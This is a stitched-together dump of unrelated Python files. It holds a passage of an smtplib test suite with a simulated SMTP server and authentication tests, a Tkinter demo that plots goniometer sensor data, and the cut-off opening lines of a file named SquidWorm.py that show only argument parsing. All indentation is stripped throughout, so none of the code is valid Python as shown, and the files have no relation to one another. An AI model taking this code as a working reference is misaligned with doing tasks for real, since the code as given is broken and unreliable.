if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism 'traps' the client in a never-ending 334 exchange
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = '[email protected]'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rset_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('[email protected]', ['[email protected]'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', '[email protected]'))
message['To'] = email.utils.formataddr(('René', '[email protected]'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], '[email protected]')
self.assertEqual(self.serv._addresses['tos'], ['[email protected]'])
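# SimSMTPServer variant that advertises SMTPUTF8/8BITMIME and records the
# details of the last message it processed for inspection by the tests.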
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
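# Tests for SMTPUTF8 support, run against SimSMTPUTF8Server.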
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <fő[email protected]>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received \r\n to \n, so we can't easily test that
# we are successfully sending \r\n :(.
expected = textwrap.dedent("""\
From: Páolo <fő[email protected]>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'fő[email protected]')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does support an initial response, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
main.py
|
from goniometer import biometrics_library, axis, OLI
import ctypes
import tkinter as tk
from tkinter import Frame
import tkinter.font as font
from tkinter.constants import LEFT
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
from matplotlib.animation import FuncAnimation
import threading
import numpy as np
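# Tkinter demo application that streams angle samples from a Biometrics twin-axis
# goniometer via OnLineInterface64.dll and plots both axes live with matplotlib.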
class Application_demo():
def __init__(self):
#-------------------- Control variables--------------------
self.data_collection_status = False
self.time_window = 15
self.time_window_ovf_count = 0
#----------------------- Goniometer -----------------------
self.dll_path = "OnLineInterface64.dll"
self.biometrics_library = biometrics_library.Biometrics_library(self.dll_path)
self.sample_rate = 100
self.axes = [axis.Axis(0, self.sample_rate), axis.Axis(1, self.sample_rate)]
#------------- Graphic User Interface variables------------
self.window = tk.Tk()
self.window.title("Biometrics Twin Axis Goniometer Python application demo")
matplotlib.use("TkAgg")
# Buttons frame
self.frame_button = Frame(self.window)
# START/STOP button
self.myFont = font.Font(family='Helvetica', size=20, weight='bold')
self.btn_start = tk.Button(self.frame_button, text = "START", font = self.myFont, command = lambda: self.start_stop_data_collection())
self.btn_reload_library = tk.Button(self.frame_button, text = "Reload library", font = self.myFont, command = lambda: self.reload_library())
self.btn_start.pack(padx = 10, pady = 5, side = LEFT)
self.btn_reload_library.pack(padx = 10, pady = 5, side = LEFT)
# Plot frame
self.frame_plot = Frame(self.window)
# Figure, plot and canvas
self.f = Figure(figsize=(10,7), dpi=100)
self.subplot = self.f.add_subplot(111)
self.subplot.grid()
self.subplot.set_ylim(-180,180)
self.subplot.set_xlim(0, self.time_window)
self.line1, = self.subplot.plot([], [], lw=2, color = "red")
self.line2, = self.subplot.plot([], [], lw=2, color = "green")
self.canvas = FigureCanvasTkAgg(self.f, self.frame_plot)
self.canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
self.frame_button.pack()
self.frame_plot.pack()
# Initial instances of thread and animation function
self.ani = FuncAnimation(self.f, self.animate, interval=10, blit=True)
self.thread = threading.Thread(name="data_collection_thread", daemon=True, target=self.data_collection, args=(self.ani,))
# This method is used to reload the Biometrics library as shown in "biometrics_library.py"
def reload_library(self):
self.biometrics_library = biometrics_library.Biometrics_library(self.dll_path)
# This method is called when START/STOP button is pressed
def start_stop_data_collection(self):
if not self.data_collection_status:
if self.biometrics_library.OnLineInterface64:
self.btn_start.configure(text="STOP")
self.data_collection_status = True
# Clear axes output data
self.axes[0].output.clear()
self.axes[0].seconds = 0
self.axes[1].output.clear()
self.axes[1].seconds = 0
# prepare plot
self.subplot.clear()
self.subplot.grid()
self.subplot.set_ylim(-180,180)
self.subplot.set_xlim(0, self.time_window)
self.time_window_ovf_count = 0
if not self.thread.is_alive():
#ani = FuncAnimation(self.f, self.animate, interval=10, blit=True)
self.line1.set_data([], [])
self.line2.set_data([], [])
# Concurrent instances of thread and animation function
self.ani = FuncAnimation(self.f, self.animate, interval=10, blit=True)
self.thread = threading.Thread(name="data_collection_thread", daemon=True, target=self.data_collection, args=(self.ani,))
self.thread.start()
else:
print("The previous experiment did not end correctly. Please, restart the application.")
else:
print("The Biometrics OnlineInterface64.dll library did not load correctly. Please, open the Biometrics DataLite application, turn off the save file mode and press the ''Reload library'' button.")
else:
self.data_collection_status = False
self.btn_start.configure(text="START")
# This method runs in a separate thread and collects data from the two axes of the goniometer
def data_collection(self, ani):
for axis in self.axes:
# Empty each axis's memory buffer before starting data collection
self.biometrics_library.empty_buffer(axis)
# Initialize some variables
axis.zeroSamplesCounter = 0
axis.seconds = 0
# Start Data Collection in Biometrics DataLite application to get some data before plotting it
self.biometrics_library.OnLineStatus(axis.channel, OLI.ONLINE_START, ctypes.byref(axis.pStatus))
while self.data_collection_status:
for axis in self.axes:
# Take the number of available samples in the memory buffer for each axis
self.biometrics_library.OnLineStatus(axis.channel, OLI.ONLINE_GETSAMPLES, ctypes.byref(axis.pStatus))
axis.samplesInBuffer = axis.pStatus.value
# If an error occurs, the value of the variable containing the number of available samples will be negative
if (axis.samplesInBuffer < 0):
print(f'OnLineStatus ONLINE_GETSAMPLES returned: {axis.samplesInBuffer}')
break
# No samples available
if (axis.samplesInBuffer == 0):
axis.zeroSamplesCounter += 1
if (axis.zeroSamplesCounter > 100000):
print("Did you switch on the sensor and turned off the save file mode on Biometrics DataLite application?")
break
# Samples available
else:
axis.zeroSamplesCounter = 0
if axis.samplesInBuffer > OLI.MAX_SAMPLES: # this is the samples limit explained in data_structure.py
axis.samplesInBuffer = OLI.MAX_SAMPLES
# Calculate the milliseconds to read from the memory buffer using the samples available in this buffer and the sample rate
mStoGet = round(axis.samplesInBuffer * 1000 / axis.sampleRate)
# Increment the seconds during which this axis has been receiving data
axis.seconds += round(mStoGet/1000, 5)
# Recalculate the samples available in the memory buffer using the calculated milliseconds
axis.samplesInBuffer = round(mStoGet * axis.sampleRate / 1000)
# Initialize this variable
axis.dataStructure.contents.cDims = 0
# call OnlineGetData to get the samples
# Note that some arguments are converted to ctypes data types, as this function is contained in a .dll file
self.biometrics_library.OnLineGetData(axis.channel, ctypes.c_int(mStoGet), ctypes.byref(axis.dataStructure), ctypes.byref(axis.pDataNum))
# Get the number of samples received after calling the "OnLineGetData" function
numberOfSamplesReceived = axis.pDataNum.value
# remove the 10 first values as they are not angles, just metadata
raw_output = list(axis.dataStructure.contents.pvData)[10:(10 + numberOfSamplesReceived)]
# convert the angles from the raw -4000..4000 range to -180..180 degrees
fixed_output = [round(value*(180/4000), 1) for value in raw_output if -4000 <= value < 4000]
# Store the fixed values into the output variable for each axis
axis.output.extend(fixed_output)
# Stop the plot animation
ani.event_source.stop()
# Call OnLineStatus with "OLI.ONLINE_STOP" to stop receiving data from the sensor
self.biometrics_library.OnLineStatus(axis.channel, OLI.ONLINE_STOP, ctypes.byref(axis.pStatus))
# This method is an animation that plots in real time the values received from the goniometer axes
def animate(self, i):
# time window overflow control
if(self.axes[0].seconds > self.time_window * (self.time_window_ovf_count + 1)):
self.time_window_ovf_count += 1
self.subplot.set_xlim([self.time_window * self.time_window_ovf_count, self.time_window * (self.time_window_ovf_count+1)])
# The vertical axis data of the plot is the output of each goniometer axis, already converted from the raw -4000..4000 range to -180..180 degrees in the data_collection method
y1 = np.array(self.axes[0].output)
y2 = np.array(self.axes[1].output)
# The horizontal axis data of the plot will be the time of each goniometer axis
x1 = np.linspace(0, self.axes[0].seconds, y1.size)
x2 = np.linspace(0, self.axes[1].seconds, y2.size)
self.line1.set_data(x1, y1)
self.line2.set_data(x2, y2)
return self.line1, self.line2
# Create an instance of Application_demo class
application_demo = Application_demo()
# Run the graphical user interface
application_demo.window.mainloop()
|
SquidWorm.py
|
from optparse import OptionParser
import os, sys
class OptionParse:
def __init__(self):
if len(sys.argv) < 2:
self.usage()
else:
